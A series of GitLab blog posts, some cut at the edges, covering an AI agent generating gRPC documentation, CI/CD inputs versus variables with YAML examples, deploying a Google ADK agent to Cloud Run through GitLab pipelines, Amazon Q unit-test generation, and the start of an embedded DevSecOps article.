This is exactly the type of tedious, yet necessary, work GitLab Duo Agent Platform is designed to handle. Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.

Let me show you how I used Duo Agent Platform to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.

You can follow along with this video:

<div style="padding:75% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1098569263?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

The challenge: Understanding gRPC communication flows

I was working with a project called "Duo Workflow Executor" that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.

My goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.

Working in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:

"Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file."

Duo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:

• Searched through relevant Go files in the project
• Read the specific file I mentioned (runner.go)
• Identified additional files that would provide necessary context
• Analyzed the codebase structure to understand the gRPC implementation

This contextual awareness is what sets agentic AI tools with great context apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.

Collaborative refinement

Rather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted.

Agent: "Should I include error handling details in the diagram?"

Me: "Don't focus on error handling. Include all actions. Focus on gRPC payload."

This back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.

Execution and results

With the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.

The agent then executed each task in sequence, providing real-time progress updates. Within minutes, it had:

• Analyzed all relevant files across the project
• Created comprehensive documentation with a detailed mermaid diagram
• Saved everything to the requested grpc.md file
• Included valuable context about outgoing payloads and connection management

The resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.

Reviewing the output

Here's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:

sequenceDiagram
participant DWS as duo-workflow-service
participant DWE as duo-workflow-executor
participant Runner as ExecutionRunner
participant ActionExecutor as Action Executor
participant FileSystem as File System/Commands


Note over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)

%% Connection Establishment
DWE->>DWS: gRPC Connection with Headers
Note over DWE, DWS: Headers: authorization (Bearer token)<br/>x-gitlab-authentication-type: oidc<br/>x-gitlab-realm, x-gitlab-global-user-id<br/>x-gitlab-oauth-token, x-gitlab-base-url<br/>x-gitlab-instance-id, x-request-id<br/>x-gitlab-namespace-id, x-gitlab-project-id


%% Workflow Start Request
DWE->>DWS: ClientEvent{StartWorkflowRequest}
Note over DWE, DWS: StartWorkflowRequest:<br/>- ClientVersion<br/>- WorkflowDefinition<br/>- Goal<br/>- WorkflowID<br/>- WorkflowMetadata<br/>- ClientCapabilities[]


%% Action Processing Loop
loop Action Processing
    DWS->>DWE: Action Message
    Note over DWS, DWE: Action Types:<br/>- Action_RunCommand {program, flags[], arguments[]}<br/>- Action_RunGitCommand {command, arguments[], repositoryUrl}<br/>- Action_RunReadFile {filepath}<br/>- Action_RunWriteFile {filepath, contents}<br/>- Action_RunEditFile {filepath, oldString, newString}<br/>- Action_RunHTTPRequest {method, path, body}<br/>- Action_ListDirectory {directory}<br/>- Action_FindFiles {namePattern}<br/>- Action_Grep {searchDirectory, pattern, caseInsensitive}<br/>- Action_NewCheckpoint {}<br/>- Action_RunMCPTool {}


    DWE->>Runner: Receive Action
    Runner->>Runner: processWorkflowActions()
    Runner->>ActionExecutor: executeAction(ctx, action)
    
    alt Action_RunCommand
        ActionExecutor->>FileSystem: Execute Shell Command
        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments<br/>in basePath directory
        FileSystem-->>ActionExecutor: Command Output + Exit Code
    
    else Action_RunReadFile
        ActionExecutor->>FileSystem: Read File
        Note over ActionExecutor, FileSystem: Check gitignore rules<br/>Read file contents
        FileSystem-->>ActionExecutor: File Contents
    
    else Action_RunWriteFile
        ActionExecutor->>FileSystem: Write File
        Note over ActionExecutor, FileSystem: Check gitignore rules<br/>Create/overwrite file
        FileSystem-->>ActionExecutor: Success/Error Message
    
    else Action_RunEditFile
        ActionExecutor->>FileSystem: Edit File
        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write<br/>Check gitignore rules
        FileSystem-->>ActionExecutor: Edit Result Message
    
    else Action_RunGitCommand
        ActionExecutor->>FileSystem: Execute Git Command 
        Note over ActionExecutor, FileSystem: Git operations with authentication<br/>Uses provided git config
        FileSystem-->>ActionExecutor: Git Command Output
    
    else Action_RunHTTPRequest
        ActionExecutor->>DWS: HTTP Request to GitLab API
        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE<br/>Path: API endpoint<br/>Body: Request payload<br/>Headers: Authorization
        DWS-->>ActionExecutor: HTTP Response
    
    else Action_ListDirectory
        ActionExecutor->>FileSystem: List Directory Contents
        Note over ActionExecutor, FileSystem: Respect gitignore rules
        FileSystem-->>ActionExecutor: Directory Listing
    
    else Action_FindFiles
        ActionExecutor->>FileSystem: Find Files by Pattern
        Note over ActionExecutor, FileSystem: Recursive search with name pattern<br/>Respect gitignore rules
        FileSystem-->>ActionExecutor: File Paths List
    
    else Action_Grep
        ActionExecutor->>FileSystem: Search Text Pattern
        Note over ActionExecutor, FileSystem: Recursive text search<br/>Case sensitive/insensitive option
        FileSystem-->>ActionExecutor: Search Results
    
    else Action_NewCheckpoint/Action_RunMCPTool
        ActionExecutor->>ActionExecutor: No-op Action
        Note over ActionExecutor: Returns empty success result
    end


    ActionExecutor-->>Runner: Action Result (string)
    
    alt Result Size Check
        Runner->>Runner: Check if result > 4MB
        Note over Runner: If result exceeds MaxMessageSize (4MB)<br/>Replace with error message about size limit
    end


    Runner->>DWE: ActionResponse
    DWE->>DWS: ClientEvent{ActionResponse}
    Note over DWE, DWS: ActionResponse:<br/>- RequestID (matches Action.RequestID)<br/>- Response (execution result string)
end


%% Workflow Completion
DWE->>DWS: CloseSend()
Note over DWE, DWS: Signal end of workflow execution


%% Analytics and Cleanup
Runner->>Runner: Send Analytics Event (Finish)
DWE->>DWE: Token Revocation (if enabled)
DWE->>DWS: Close gRPC Connection

This diagram reveals several important architectural insights that would have taken considerable time to extract manually:

• Bidirectional communication: The workflow executor both initiates requests and responds to service actions.
• Rich payload structure: Each action type has specific parameters and expected responses.
• Multiple integration points: The executor interacts with local filesystem, Git repositories, and GitLab APIs.
• Comprehensive action set: Nine different action types handle everything from file operations to HTTP requests.
• Proper lifecycle management: Clear connection establishment and teardown patterns.

What impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.

Looking ahead

This demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:

• Code reviews: Agents can analyze merge requests with full project context
• Testing: Generate comprehensive test suites based on actual usage patterns
• Debugging: Trace issues across multiple services and components
• Security scanning: Identify vulnerabilities with understanding of your specific architecture
• CI/CD optimization: Improve pipeline performance based on historical data

GitLab Duo Agent Platform will enter public beta soon so join the wait list today.

Stay tuned to the GitLab Blog and social channels for additional updates. GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.

Learn more

• Agentic AI guides and resources
• GitLab Duo Agent Platform: What’s next for intelligent DevSecOps
• What is agentic AI?
• From vibe coding to agentic AI: A roadmap for technical leaders

While CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.

This article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.

The hidden costs of variable-based parameter passing

The problems with using variables for parameter passing are numerous and frustrating.

No type validation

Variables are strings. There is no type validation, meaning a pipeline expecting a boolean or a number, but accidentally receives a string. This leads to unexpected failures deep into the pipeline execution. In the case of a deployment workflow for example, hours after it was started a critical production deployment fails because a boolean check in a variable was not passed as expected.

Runtime mutability

Variables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets DEPLOY_ENV=staging, but deploy_job_b changes the DEPLOY_ENV value to production.

Security risks

Security concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple BUILD_TYPE parameter, that seems innocuous at first glance, suddenly has access to production secrets simply because variables do not inherently distinguish between parameters and sensitive data.

Perhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.

Many users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking "How can we test pipelines locally?" we started asking "How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?"

Understanding variable precedence

GitLab's variable system includes multiple precedence levels to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.

When creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.

When including multiple templates, it also can be challenging to track which variables are being set where and how they might interact.

In addition, components authors need to document not just what variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.

Variable precedence examples

Main pipeline file (.gitlab-ci.yml):

variables:

  ENVIRONMENT: production  # Top-level default for all jobs

  DATABASE_URL: prod-db.example.com

include:

  - local: 'templates/test-template.yml'

  - local: 'templates/deploy-template.yml'

Test template (templates/test-template.yml):

run-tests:

  variables:

    ENVIRONMENT: test  # Job-level variable overrides the default

  script:

    - echo "Running tests in $ENVIRONMENT environment"  

    - echo "Database URL is $DATABASE_URL"  # Still inherits prod-db.example.com!

    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL

    `# Issue: Tests run in "test" environment but against production database`

Deploy template (templates/deploy-template.yml):

deploy-app:

  script:

    - echo "Deploying to $ENVIRONMENT"  # Uses production (top-level default)

    - echo "Database URL is $DATABASE_URL"  # Uses prod-db.example.com

    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL

    # This will deploy to production as intended

The challenges in this example:

1. Partial inheritance: The test job gets ENVIRONMENT=test but still inherits DATABASE_URL=prod-db.example.com.

2. Coordination complexity: Template authors must know what top-level variables exist and might conflict.

3. Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.

4. Hidden dependencies: Templates become dependent on the main pipeline's variable names.

GitLab recognized these pain points and introduced CI/CD inputs as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.

CI/CD inputs fundamentals

Inputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.

Configuration flexibility and scope

One of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format $[[ inputs.input-id ]], meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.

One common use case we've seen is that users define their job names like test-$[[ inputs.environment ]]-deployment.

When using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. Input-based job names ensure each inclusion creates uniquely named jobs.

Before inputs:

test-service:

  variables:

    SERVICE_NAME: auth-service

    ENVIRONMENT: staging

  script:

    - run-tests-for $SERVICE_NAME in $ENVIRONMENT

With inputs:

spec:

  inputs:

    environment:

      type: string

    service_name:

      type: string

test-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:

  script:

    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]

When included multiple times with different inputs, this creates jobs like test-auth-service-staging, test-payment-service-production, and test-notification-service-development. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.

Now let's go back to the first example in the top of this blog and use inputs, one immediate benefit is that instead of maintaining multiple templates file we can use one reusable template with different input values:

spec:

  inputs:

    environment:

      type: string

    database_url:

      type: string

    action:

      type: string

---


$[[ inputs.action ]]-$[[ inputs.environment ]]:

  script:

    - echo "Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment"

    - echo "Database URL is $[[ inputs.database_url ]]"

    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]

And in the main gitlab-ci.yml file we can include it twice (or more) with different values, making sure we avoid naming collisions

include:

  - local: 'templates/environment-template.yml'

    inputs:

      environment: test

      database_url: test-db.example.com

      action: tests

  - local: 'templates/environment-template.yml'

    inputs:

      environment: production

      database_url: prod-db.example.com

      action: deploy

The result: Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.

Validation and type safety

Another key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.

Here is an example of the enormous benefit of type validation.

Without type validation (variables):

variables:
  ENABLE_TESTS: "true"  # Always a string
  MAX_RETRIES: "3"      # Always a string

  
deploy_job:
  script:
    - if [ "$ENABLE_TESTS" = true ]; then  # This fails!
        echo "Running tests"
      fi
    - retry_count=$((MAX_RETRIES + 1))      # String concatenation: "31"

Problem: The boolean check fails because “true” (string) is not equal to true, (boolean).

With type validation (inputs):

spec:
  inputs:
    enable_tests:
      type: boolean
      default: true
    max_retries:
      type: number
      default: 3

      
deploy_job:
  script:
    - if [ "$[[ inputs.enable_tests ]]" = true ]; then  # Works correctly
        echo "Running tests"
      fi
    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4

Real-world impact for variable type validation failure: A developer or a process triggers a GitLab CI/CD pipeline with ENABLE_TESTS = yes instead of true. Assuming it takes on average 30 minutes before the deployment job starts, then finally when this job kicks off, 30 minutes or longer into the pipeline run, the deployment script tries to evaluate the boolean and fails.

Imagine the impact in terms of time-to-market and, of course. developer time trying to debug why a seemingly basic deploy job failed.

With type inputs, GitLab CI/CD will immediately throw an error and provide an explicit error message regarding the type mismatch.

Security and access control

Inputs provide enhanced security through controlled parameter passing with explicit contracts that define exactly what values are expected and allowed, creating clear boundaries between parameter passing to the pipeline, In addition. inputs are immutable. Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.

Scope and lifecycle

When you define variables using the variables: keyword at the top level of your .gitlab-ci.yml file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.

Inputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.

Working with variables and inputs together

We recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.

Let's look at this real-world example.

Variable expansion in rules conditions

A common challenge occurs when using variables that contain other variable references in rules:if conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:

# This doesn't work as expected

variables:
  TARGET_ENV:
    value: "${CI_COMMIT_REF_SLUG}"

deploy-job:
  rules:
    - if: '$TARGET_ENV == "production"'  # Compares "${CI_COMMIT_REF_SLUG}" != "production"
      variables:
        DEPLOY_MODE: "blue-green"

The expand_vars function solves this by forcing proper variable expansion in inputs:

spec:
  inputs:
    target_environment:
      description: "Target deployment environment"
      default: "${CI_COMMIT_REF_SLUG}"
---


deploy-job:
  rules:
    - if: '"$[[ inputs.target_environment | expand_vars ]]" == "production"'
      variables:
        DEPLOY_MODE: "blue-green"
        APPROVAL_REQUIRED: "true"
    - when: always
      variables:
        DEPLOY_MODE: "rolling"
        APPROVAL_REQUIRED: "false"
  script:
    - echo "Target: $[[ inputs.target_environment | expand_vars ]]"
    - echo "Deploy mode: ${DEPLOY_MODE}"

Why this matters

Without expand_vars, rule conditions evaluate against the literal variable reference (like "${CI_COMMIT_REF_SLUG}") rather than the expanded value (like "production"). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.

Important notes about expand_vars:

• Only variables that can be used with the include keyword are supported

• Variables must be unmasked (not marked as protected/masked)

• Nested variable expansion is not supported

• Rule conditions using expand_vars must be properly quoted: '"$[[ inputs.name | expand_vars ]]" == "value"'

This pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.

Function chaining for advanced processing

Along with expand_vars, you can use functions like truncate to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.

spec:  

  inputs:

    service_identifier:

      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'

---


create-resource:

  script:

    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]

This integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.

From components only to CI pipelines

Up until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the include: syntax. This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.

Pipeline-wide inputs support

Starting with GitLab 17.11, GitLab users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:

• Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.

• Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.

• Manual pipelines: Present users with a clean, validated form interface.

Those enhancements, with more to follow, allow teams to modernize their pipelines while maintaining backward compatibility gradually. Once inputs are fully adopted, users can disable pipeline variables to ensures a more secure and predictable CI/CD environment.

Summary

The transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.

We understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The expand_vars function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.

By starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. Additionally, moving to inputs creates an excellent foundation for leveraging GitLab's CI/CD Catalog, where reusable components with typed interfaces become powerful building blocks for your DevOps workflows but more on that in our next blog post.

Your future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.

What's next

Looking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that dynamically adjust based on user selections, and providing job-level inputs that allow users to retry individual jobs with different parameter values. We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. You can also provide general feedback on CI/CD inputs through our feedback issue.

Read more

• How to include file references in your CI/CD components
• CI/CD inputs documentation
• CI/CD Catalog goes GA: No more building pipelines from scratch
• GitLab environment variables demystified

What are AI agents and why do they matter?

Agentic AI represents a significant evolution in artificial intelligence. Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.

This tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.

Our demo application: Canada City Advisor

To demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.

Here's how it works:

• Users input their budget requirements and lifestyle preferences.

• The root agent coordinates two sub-agents:

  • A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.
  • A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses Open-Meteo to get the proper city information.

• The system generates personalized city recommendations

This multi-agent architecture showcases the power of agentic AI - different specialized agents working together to solve a complex problem. The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.

Prerequisites

Before we begin, ensure you have:

• A Google Cloud project with the following APIs enabled:

  • Cloud Run API
  • Artifact Registry API
  • Vertex AI API

• A GitLab project for your source code

• Appropriate permissions in both GitLab and Google Cloud

Step 1: Set up IAM integration with Workload Identity Federation

The first step establishes secure, keyless authentication between GitLab and Google Cloud using Workload Identity Federation. This eliminates the need for service account keys and improves security.

In your GitLab project:

1. Navigate to Settings > Integrations > Google Cloud IAM.

2. Provide the following information:

   • Project ID: Your Google Cloud project ID
   • Project Number: Found in your Google Cloud console
   • Pool ID: A unique identifier for your workload identity pool
   • Provider ID: A unique identifier for your identity provider

GitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.

Step 2: Configure Google Artifact Registry integration

Next, we'll set up the connection to Google Artifact Registry where our container images will be stored.

1. In GitLab, go to Settings > Integrations > Google Artifact Registry.

2. Enter:

   • Google Cloud Project ID: Same as in Step 1
   • Repository Name: Name of an existing Artifact Registry repository
   • Location: The region where your repository is located

Important: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.

GitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.

Additionally, add these roles to your service principal for Cloud Run deployment:

• roles/run.admin

• roles/iam.serviceAccountUser

• roles/cloudbuild.builds.editor

You can add these roles using the following gcloud commands:

GCP_PROJECT_ID="<your-project-id>" #replace

GCP_PROJECT_NUMBER="<your-project-number>" #replace

GCP_WORKLOAD_IDENTITY_POOL="<your-pool-id>" #replace


gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member="principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true" \
  --role='roles/run.admin'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member="principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true" \
  --role='roles/iam.serviceAccountUser'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member="principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true" \
  --role='roles/cloudbuild.builds.editor'

Step 3: Create the CI/CD pipeline

Now for the exciting part – let's build our deployment pipeline! GitLab's CI/CD components make this remarkably simple.

Create a .gitlab-ci.yml file in your project root:

stages:
  - build
  - test
  - upload
  - deploy

variables:
  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA
  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA

build:
  image: docker:24.0.5
  stage: build
  services:
    - docker:24.0.5-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $GITLAB_IMAGE .
    - docker push $GITLAB_IMAGE

include:
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml
  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main
    inputs:
      stage: upload
      source: $GITLAB_IMAGE
      target: $AR_IMAGE
  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main
    inputs:
      stage: deploy
      project_id: "<your-project-id>" #replace
      service: "canadian-city"
      region: "us-central1"
      image: $AR_IMAGE

The pipeline consists of four stages:

1. Build: Creates the Docker container with your AI agent

2. Test: Runs security scans (container scanning, dependency scanning, SAST)

3. Upload: Pushes the container to Artifact Registry

4. Deploy: Deploys to Cloud Run

The great thing about using GitLab's CI/CD components is that you only need to provide a few parameters - the components handle all the complex authentication and deployment logic.

Step 4: Deploy and test

With everything configured, it's time to deploy:

1. Commit your code and .gitlab-ci.yml to your GitLab repository.

2. The pipeline will automatically trigger.

3. Monitor the pipeline progress in GitLab's CI/CD interface.

4. Once complete, find your Cloud Run URL in the Google Cloud Console.

You'll see each stage execute:

• Build stage creates your container.

• Test stage runs comprehensive security scans.

• Upload stage pushes to Artifact Registry.

• Deploy stage creates or updates your Cloud Run service.

Security benefits

This approach provides several security advantages:

• No long-lived credentials: Workload Identity Federation eliminates service account keys.

• Automated security scanning: Every deployment is scanned for vulnerabilities.

• Audit trail: Complete visibility of who deployed what and when.

• Principle of least privilege: Fine-grained IAM roles limit access.

Summary

By combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.

Use this tutorial's complete code example to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with a free trial.

Here's where GitLab Duo with Amazon Q , which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.

How GitLab Duo with Amazon Q works

So how does this work? Let's walk through the process together. When you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the "Changes" tab to see the new code you've added.

Next, you invoke Amazon Q by entering a quick action command. All you need to do is type /q test in the issue comment box. It's that simple – just a forward slash, the letter "q", and the word "test".

Once you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.

Within moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.

Why use GitLab Duo with Amazon Q?

Here's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.

Key benefits of this feature:

• Significantly reduces time spent writing unit tests
• Ensures comprehensive test coverage across your codebase
• Maintains consistent testing quality across all team members
• Catches issues before they reach production
• Accelerates your overall development velocity

Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:

<!-- blank line -->

<figure class="video_container"> <iframe src="https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Get started with GitLab Duo with Amazon Q today

Want to learn more about GitLab Duo with Amazon Q? Visit the GitLab and AWS partner page for detailed information.

Agentic AI resources

• Agentic AI guides and resources
• What is agentic AI?
• GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available
• GitLab Duo with Amazon Q documentation

What is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.

Convergence of market forces

Three powerful market forces are converging to compel embedded teams to modernize their development practices.

1. The software-defined product revolution

